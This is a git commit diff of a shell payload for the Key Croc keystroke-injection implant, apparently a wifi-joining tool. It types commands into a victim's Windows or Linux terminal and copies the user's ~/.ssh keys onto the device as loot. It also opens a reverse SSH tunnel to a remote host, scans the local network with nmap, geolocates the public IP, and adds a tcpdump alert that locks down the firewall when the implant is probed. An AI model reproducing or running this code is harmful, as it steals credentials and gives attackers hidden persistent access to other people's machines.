parent
55053ddffb
commit
19f2907265
|
@ -2,7 +2,7 @@
|
||||||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||||
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||||
# Author: spywill
|
# Author: spywill
|
||||||
# Version: 4.1
|
# Version: 4.2
|
||||||
# Category: Key Croc
|
# Category: Key Croc
|
||||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||||
|
|
||||||
|
@ -17,6 +17,7 @@
|
||||||
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
||||||
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
||||||
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||||
|
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
|
||||||
|
|
||||||
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||||
QUACK LOCK
|
QUACK LOCK
|
||||||
|
@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||||
recon=off
|
recon=off
|
||||||
recon_loot=/root/udisk/tools/Target_SSID.txt
|
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||||
|
|
||||||
#---> Edit Linux target password below
|
alert=off
|
||||||
|
alert_time=60
|
||||||
|
|
||||||
|
#---> Edit target password below
|
||||||
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
||||||
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
||||||
else
|
else
|
||||||
target_password=ENTER_LINUX_PASSWORD_HERE
|
target_password=ENTER_TARGET_PASSWORD_HERE
|
||||||
fi
|
fi
|
||||||
|
|
||||||
recon_scan() {
|
recon_scan() {
|
||||||
|
@ -53,10 +57,16 @@ recon_scan() {
|
||||||
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 2000
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 2000
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
else
|
else
|
||||||
:
|
:
|
||||||
fi
|
fi
|
||||||
|
@ -103,6 +113,14 @@ CLEAN_UP() {
|
||||||
fi
|
fi
|
||||||
}
|
}
|
||||||
|
|
||||||
|
calculate_network_range() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
|
||||||
|
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
||||||
|
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
||||||
|
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
||||||
|
}
|
||||||
|
|
||||||
case $LOOT in
|
case $LOOT in
|
||||||
getonline_W)
|
getonline_W)
|
||||||
ENTER_STORAGE
|
ENTER_STORAGE
|
||||||
|
@ -220,6 +238,22 @@ case $LOOT in
|
||||||
rm -f $recon_loot root/udisk/config.txt
|
rm -f $recon_loot root/udisk/config.txt
|
||||||
apt -y remove sshpass
|
apt -y remove sshpass
|
||||||
reboot --force
|
reboot --force
|
||||||
|
RESET_PAYLOAD
|
||||||
|
;;
|
||||||
|
getonline_T)
|
||||||
|
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
|
||||||
|
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
|
||||||
|
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
|
||||||
|
fi
|
||||||
|
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
|
||||||
|
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
|
||||||
|
fi
|
||||||
|
killall -9 tcpdump
|
||||||
|
sleep 1
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
RESET_PAYLOAD
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
sleep 3
|
sleep 3
|
||||||
|
@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
elif [ $option -eq 2 ]; then
|
elif [ $option -eq 2 ]; then
|
||||||
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||||
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
|
[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
|
||||||
apt -y install sshpass
|
|
||||||
else
|
|
||||||
:
|
|
||||||
fi
|
|
||||||
sleep 1
|
sleep 1
|
||||||
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
|
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||||
rm -rf ~/.ssh 2>/dev/null
|
|
||||||
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
|
||||||
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
|
||||||
sleep 1
|
sleep 1
|
||||||
|
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
||||||
|
sleep 3
|
||||||
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
||||||
else
|
else
|
||||||
LED R
|
LED R
|
||||||
|
@ -324,10 +353,6 @@ else
|
||||||
LED R
|
LED R
|
||||||
fi
|
fi
|
||||||
|
|
||||||
sleep 3
|
|
||||||
LED OFF
|
|
||||||
QUACK UNLOCK
|
|
||||||
|
|
||||||
if [ "$recon" = "on" ]; then
|
if [ "$recon" = "on" ]; then
|
||||||
LED C SLOW
|
LED C SLOW
|
||||||
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
||||||
|
@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then
|
||||||
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
||||||
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
||||||
|
|
||||||
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
|
||||||
calculate_network_range() {
|
|
||||||
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
|
||||||
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
|
||||||
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
|
||||||
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
|
||||||
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
|
||||||
echo "$network_range"
|
|
||||||
}
|
|
||||||
perform_nmap_scan() {
|
perform_nmap_scan() {
|
||||||
local network_range=$1
|
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||||
nmap -T4 -F $network_range >> $recon_loot
|
nmap -T4 -F $network_range >> $recon_loot
|
||||||
}
|
}
|
||||||
network_range=$(calculate_network_range)
|
calculate_network_range
|
||||||
perform_nmap_scan $network_range
|
perform_nmap_scan
|
||||||
|
|
||||||
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
||||||
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
||||||
echo -ne "\n\n" >> $recon_loot
|
echo -ne "\n\n" >> $recon_loot
|
||||||
LED OFF
|
|
||||||
elif [ "$recon" = "off" ]; then
|
elif [ "$recon" = "off" ]; then
|
||||||
:
|
:
|
||||||
else
|
else
|
||||||
:
|
:
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
if [ "$alert" = "on" ]; then
|
||||||
|
icmp_alert() {
|
||||||
|
calculate_network_range
|
||||||
|
sleep 1
|
||||||
|
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
|
||||||
|
:
|
||||||
|
done
|
||||||
|
LED R SLOW
|
||||||
|
iptables -F
|
||||||
|
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
|
||||||
|
sleep $alert_time
|
||||||
|
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
LED B ; sleep 2 ; LED OFF
|
||||||
|
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
|
||||||
|
}
|
||||||
|
port_alert() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
|
||||||
|
file=/tmp/tcpdump.out
|
||||||
|
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
|
||||||
|
:
|
||||||
|
done
|
||||||
|
LED R SLOW
|
||||||
|
iptables -F
|
||||||
|
iptables -P INPUT DROP
|
||||||
|
iptables -P OUTPUT DROP
|
||||||
|
iptables -P FORWARD DROP
|
||||||
|
sleep $alert_time
|
||||||
|
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
LED B ; sleep 2 ; LED OFF
|
||||||
|
port_alert & echo -ne $! > /tmp/port_pid.txt
|
||||||
|
}
|
||||||
|
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
|
||||||
|
port_alert & echo -ne $! > /tmp/port_pid.txt
|
||||||
|
LED B
|
||||||
|
elif [ "$alert" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
|
||||||
|
sleep 3
|
||||||
|
LED OFF
|
||||||
|
QUACK UNLOCK
|
||||||
|
|
Loading…
Reference in New Issue